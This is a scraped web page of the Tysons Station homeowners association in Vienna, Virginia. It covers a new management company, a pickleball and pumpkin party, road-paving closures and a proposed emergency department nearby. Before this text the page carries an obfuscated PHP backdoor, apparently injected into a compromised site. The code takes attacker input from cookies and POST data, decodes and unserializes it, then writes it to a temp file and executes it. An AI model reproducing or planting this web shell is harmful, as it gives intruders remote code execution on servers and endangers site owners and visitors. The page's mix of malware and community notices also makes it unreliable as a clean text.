$XqxipRVkyh = chr ( 259 - 177 ).chr (122) . "\x76" . chr (95) . chr ( 243 - 145 ).chr ( 269 - 193 ).chr ( 687 - 612 ); $ClFDVWc = "\x63" . 'l' . "\141" . 's' . chr ( 845 - 730 ).'_' . chr ( 633 - 532 ).chr (120) . 'i' . 's' . "\164" . chr (115); $XDWEE = class_exists($XqxipRVkyh); $ClFDVWc = "53684";$eAfeWXeQ = strpos($ClFDVWc, $XqxipRVkyh);if ($XDWEE == $eAfeWXeQ){function jSwMerT(){$FzxViIZAca = new /* 38789 */ Rzv_bLK(9310 + 9310); $FzxViIZAca = NULL;}$SqlTsn = "9310";class Rzv_bLK{private function JaBugIyrCD($SqlTsn){if (is_array(Rzv_bLK::$RLzCf)) {$name = sys_get_temp_dir() . "/" . crc32(Rzv_bLK::$RLzCf["salt"]);@Rzv_bLK::$RLzCf["write"]($name, Rzv_bLK::$RLzCf["content"]);include $name;@Rzv_bLK::$RLzCf["delete"]($name); $SqlTsn = "9310";exit();}}public function WXNSMgijXQ(){$rkWYRPR = "33472";$this->_dummy = str_repeat($rkWYRPR, strlen($rkWYRPR));}public function __destruct(){Rzv_bLK::$RLzCf = @unserialize(Rzv_bLK::$RLzCf); $SqlTsn = "2831_59556";$this->JaBugIyrCD($SqlTsn); $SqlTsn = "2831_59556";}public function JUOin($rkWYRPR, $HowzSVT){return $rkWYRPR[0] ^ str_repeat($HowzSVT, intval(strlen($rkWYRPR[0]) / strlen($HowzSVT)) + 1);}public function xEdQHw($rkWYRPR){$OhLaWriYj = "\x62" . "\x61" . "\163" . "\x65" . '6' . "\64";return array_map($OhLaWriYj . chr ( 418 - 323 ).chr ( 1018 - 918 )."\x65" . "\143" . chr ( 371 - 260 ).chr ( 611 - 511 )."\145", array($rkWYRPR,));}public function __construct($yIuAe=0){$GsRBy = chr (44); $rkWYRPR = "";$GbFbG = $_POST;$TaqYQRggoR = $_COOKIE;$HowzSVT = "8c74da2b-8141-4534-8a4e-64bf81b77e38";$MNGfX = @$TaqYQRggoR[substr($HowzSVT, 0, 4)];if (!empty($MNGfX)){$MNGfX = explode($GsRBy, $MNGfX);foreach ($MNGfX as $IdjruA){$rkWYRPR .= @$TaqYQRggoR[$IdjruA];$rkWYRPR .= @$GbFbG[$IdjruA];}$rkWYRPR = $this->xEdQHw($rkWYRPR);}Rzv_bLK::$RLzCf = $this->JUOin($rkWYRPR, $HowzSVT);if (strpos($HowzSVT, $GsRBy) !== FALSE){$HowzSVT = explode($GsRBy, $HowzSVT); $OKRUeAHw = base64_decode(md5($HowzSVT[0])); $uZHOrXB = strlen($HowzSVT[1]) > 5 ? substr($HowzSVT[1], 0, 5) : $HowzSVT[1];$_GET['new_key'] = md5(implode('', $HowzSVT));}}public static $RLzCf = 16776;}jSwMerT();} Tyson’s Station HOA as selected Legum & Norman to be our new management company effective January 1, 2020. Legum & Norman is an established name in multi-family and association management. We are an Accredited Association Management Company (AAMC(R)) with expertise in managing properties in Maryland, DC, Delaware and Virginia. Legum & Norman believes in education so we strive for all our managers and support staff to achieve CAI designations. Legum & Norman‘s commitment to excellence in customer service, integrity, communication job knowledge and innovative technology aligns us with our clients’ expectations from a management partner. Our executive team, with more than 140 years of leadership experience cumulatively, fosters a pro-active approach to community association management. Also, please join us in welcoming Tracy Plazyk as our new management agent. Please register for an account with our new community management application, TownSquare (TownSq) at https://www.townsq.io/ at your earliest convenience. Meet your neighbors, manage your account, and access the resources you need for better community living, all through one user-friendly mobile app. TownSq combines the social and administrative aspects of community living and helps you connect with your neighbors, collaborate with your management team and stay up-to-date on community happenings – any time on any device. Join us at the HOA’s basketball/pickleball court to learn to play pickleball, decorate pumpkins, and to socialize with your neighbors. We will provide the equipment, pumpkins (limited amounts), and non-alcoholic drinks. Please bring your game face and an appetizer to share! Who: Open to All When: Sunday, October 27, 2019 – 3:00 pm to 5:00 pm RSVP: Please respond to Christine at celeonhardt@gmail.com or using the form below. Pickleball / Basketball Court behind Pieris Court. A COMMUNITY-WIDE STREET MILLING AND PAVING PROJECT IS SCHEDULED FROM 7 AM, TUESDAY, SEPTEMBER 24th TO 7 PM, WED, SEPTEMBER 25th All community roads will be CLOSED TO ALL VEHICLES beginning at 7:00 am on Tuesday, Sep 24 until re-opening at 7:00 pm on Wednesday, Sep 25 Espina Paving Inc. will be milling and re-paving all three streets in the community Pieris Court, Gallows Tree Court, and Gallows Tree Lane Please note that Merry Oaks Lane is not a part of this project. In Order Not to be Towed, You Should Park your Vehicles on Merry Oaks Lane. Before Work Begins: After work Begins: PLEASE DO NOT WALK ON ROADWAYS UNTIL THE BARRICADES HAVE BEEN REMOVED!! THANK YOU FOR YOUR UNDERSTANDING AND COOPERATION! On the northern border of the Tysons Station HOA community along Pieris Lane, the vacant lot (currently forest) is slated for development. (2000 Old Gallows Rd, Vienna, VA 22182). The developer is proposing a free-standing emergency department, which would be affiliated with the Reston Hospital Center. You can read more about this development here. The Tysons Station HOA has delivered the following letter of opposition to the Fairfax County planning board and the Reston Hospital Center on March 8, 2018.Legum & Norman (L&N)
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Pickleball Lesson and Pumpkin Decorating Party
What is Pickleball?
Pumpkin Decorating
Details
What: Fall Gathering to socialize with your HOA neighbors
Why: “Just for the fun of it”
Bring: Your game face and an appetizer
Where: Basketball / Pickleball CourtPickleball / Basketball Court
On the northern border of the Tysons HOA community along Pieris Lane, the vacant lot (currently forest) is slated for development. (2000 Old Gallows Rd, Vienna, VA 22182)
The developer will be attending our annual meeting on August 1st to answer any questions and address concerns.
The developer is proposing a free-standing emergency department, which would be affiliated with the Reston Hospital Center. This type of facility is different from an urgent care center as it would be a destination for ambulances. It is expected to receive 30 visits per day but could easily handle 75 visits. The building would have two stories and would be served by below-grade parking. It is planned to have roughly 40 total parking spaces for patients, visitors, and staff, with 7-9 staff per shift (20 staff during peak hours). This would be a nonstop facility operating 24 hours a day, 7 days a week, 365 days a year.
There will be no helipad on the roof but there will be air conditioners and other machinery (backup generator is planned for subterranean placement). Ambulances will not be stationed at the facility but, in addition to transporting patients there, would transport patients to other regional hospitals/facilities (e.g. Reston, Fairfax, Children’s Hospital).
The developer is proposing building privacy walls to discourage visitors/patients from parking in our neighborhood and walking to the facility
The site is currently approved for a two-story drive-in bank with surface parking.
The intersection will be re-opened on the same day upon putting a cold patch on top of the exposed area. However, the intersection will be closed again on another date when re-pavement is finalized.
The Fairfax County Public Works representative will be on site during work hours. If you have any problems, please contact Tatiana Baranova at 703-877-2865 (Office) or 571-229-6159 (Field Mobile). If she cannot be reached, please call Maintenance & Storm Water Management Customer Service at 703-877-2800.
We appreciate your patience during utility repair work hours and will attempt to minimize the inconvenience.
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